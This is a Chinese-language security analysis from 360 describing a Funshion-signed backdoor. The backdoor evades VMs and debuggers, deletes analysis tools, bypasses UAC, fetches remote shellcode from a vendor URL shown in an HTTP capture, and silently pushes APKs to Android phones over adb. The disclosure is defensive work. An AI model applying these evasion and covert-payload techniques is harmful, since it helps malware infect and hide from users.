360安全衛士 · 2015/10/16 15:37
by qxnjawk
0x00 摘要
最近,360安全中心檢測到,大量推廣程式在推廣一款帶有有效風行簽名——“Beijing Funshion Online Technologies Ltd.”的靜默安裝程式。後續分析發現,該程式靜默安裝,無法解除安裝,通過LSP注入系統各個聯網程式執行。帶有反虛擬機器,反除錯,抗分析,遠端控制,遠端執行的能力,是一款植入使用者計算機的後門程式。
0x01 FunMini檔案分析
基本資訊:
- MD5 : 64a34cc9a22fa93d0705920e4c3aed0c
- 檔名稱 : FunMini.exe
- 檔案型別 : PE,未加殼
- 簽名資訊 : Beijing Funshion Online Technologies Ltd.
- 簽名正常 風行公司的推廣程式
行為概述:
該樣本執行之後,會對目標機器的環境進行檢測:檢測虛擬機器,各種程式開發工具等。
如果不存在開發工具和虛擬機器,就會下載一個後門dll程式載入執行,該dll還會進行手機app推廣。
行為詳解:
木馬檢查使用者機器上是否存在IDA, vc6.0, windbg.exe等分析人員常用的分析工具。這類檢測在木馬程式中很常見,正常面向大眾的軟體,很少做這類檢測。
以下為木馬檢測的所有字串的記憶體截圖:
檢測通過之後,後門從伺服器下載一個名為Foamii.dll的檔案,而該檔案才是一切行為的核心。
0x02 Foamii.dll檔案分析
基本資訊:
- 名稱 : Foamii.dll
- MD5 : a8367b1199422f103da439678a1a3683
- 檔案型別 : win32 PE,DLL
- 簽名資訊 : Beijing Funshion Online Technologies Ltd.
- 簽名正常
行為詳解:
木馬首先呼叫WinExec函式啟動rundll32.exe作為宿主程式,呼叫Foamii.dll的startup函式
執行後,dll會從伺服器讀取線上shellcode程式碼到本地
shellcode的遠端地址竟然就堂而皇之的掛在風行官網上:http://fld.funshion.com/instant/instant?bid=52
用瀏覽器開啟該URL內容如下:
資料包文如下圖:
GET /instant/instant?bid=52 HTTP/1.1
Cache-Control: max-age=43200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Funshion/1.0.0.1
Host: fld.funshion.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 23 Sep 2015 07:12:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
184
..TKDS…..$..e..1..}…_/…6………..d..`CG..W…S…..V……=-…..\.Gd4..*..a}…X.#..Y…}R …o\W.]I.M.Jw…%.Lm.l._..Zq..n1.X[+F.+….~…c.J…~.]./..’d2…….z.c(.{.(.n..%..8=.3`.`.W…!….E..1.j.U….[..
#……T&…/……!<.[email protected]=yH.i.MV…..i…..A…..e.._g.YL`…..,5]R..`……&
Y….(e….@.J.%.O.T.l..U+…….5..6.]..a{`.? .IEX….<xx…..-…k…}…I..\
0
複製程式碼
而載入shellcode後,程式碼會向伺服器發起訪問,返回資訊則是一個json串:
顯然,json串中又為shellcode指明瞭一個新的下載地址,下載回來的則是一個名為Foamii.zip的壓縮檔案
當Foamii.dll將Foamii.zip下載回來之後,將其解壓,並進一步釋放了一個名為FunNail.dll的程式
0x03 FunNail.dll檔案分析
檔案資訊:
- 檔名稱 : FunNail.dll
- MD5 : 042ace2a209f537bb9402a563894cf9e
- 簽名資訊 : Beijing Funshion Online Technologies Ltd.
行為概述:
該程式被執行後,首先會檢測當前環境是否執行於虛擬機器當中,同時刪除PcHunter, smiff等常見分析工具。然後下載推廣程式,進行推廣。
行為詳解:
木馬呼叫IsProcessorFeaturePresent檢測自身是否正處於除錯環境中,由此判斷自身是否正在被分析人員分析:
若並非處於除錯環境中,則申請記憶體執行shellcode
之後,建立一個模態對話方塊,關鍵的工作函式就放在了窗體回撥函式中:
工作函式中,首先是檢測虛擬機器情況,看自己是否執行於虛擬機器之中:
而後,程式會對磁碟中的進行遍歷
遍歷檔案過程中,一旦發現檢測分析工具則立即刪除:
刪除PCHunter32.exe檔案
刪除smsniff.exe檔案
另外,此處還有一個插曲:如果程式檢測到當前正執行於Win7之後的系統,程式甚至還有專門用於繞過UAC防護的程式碼,考慮不可謂不周到。
一切準備工作停當之後,便下載了一套安卓手機的連線元件回來:
同時開啟一個轉麼的執行緒,用來等待手機usb裝置接入
一旦發現有安卓手機接入,則建立一個可讀寫的pipe管道,主要為adb fork-server 服務。
而後利用adb命令在手機端建立一個 adb fork-server server程式 ,用於通過adb連線繼而到電腦的手機。
在手機中建立程式adb fork-server server成功之後,會讀取手機端adb fork-server server的資料
並啟動daemon 守護程式
同時下載一個或幾個APK檔案到本地:
現在要做的,就是找到SD卡或者手機內部儲存的tmp路徑,並將已經準備好的apk檔案推送到手機當中:
最後,安裝並啟動安卓的daemon守護程式,拼接adb shell:install命令用來啟動apk進行流氓推廣
以上這一切,使用者是完全沒有任何感知的,能感知到的唯有在手機上的這一次又一次的不期而遇而已……
0x04 總結
360安全中心最早接到關於帶有風行簽名程式從PC端向安卓機強推安卓應用的問題,最早見於去年(2014年)12月中旬,當時就曾組織過技術力量對該族系推廣進行過攔截。但在沉寂了9個多月之後,今年9月中旬,該族系又變換了更加犀利的反安全軟體程式碼捲土重來。
目前360已對其推廣做了攔截,並提醒使用者及時清理,該後門安裝量已經過數百萬臺,並且依然在不斷的變種與我們進行對抗。
由衷希望廠商管理好自己產品,不要在這條路上越走越遠才好。